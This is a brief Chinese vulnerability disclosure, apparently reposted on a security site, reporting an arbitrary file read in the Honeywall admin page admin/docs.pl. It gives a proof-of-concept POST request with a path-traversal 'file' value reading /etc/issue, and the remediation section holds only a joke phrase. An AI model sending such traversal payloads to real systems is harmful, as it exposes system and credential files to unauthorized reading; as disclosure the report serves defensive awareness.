简要描述:Honeywall后台管理界面存在任意文件读取漏洞详细说明:admin/docs.pl 对于 POST的file检查不严。可以自己构造post包来读取任意文件。漏洞证明:http://xxx.xxx.xxx/admin/docs.plPOST-content:act=16&file=../../../../../../../../etc/issue&submit=Submit
修复方案:闹太套
关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心
版权所有: 红黑联盟--致力于做实用的IT技术学习网站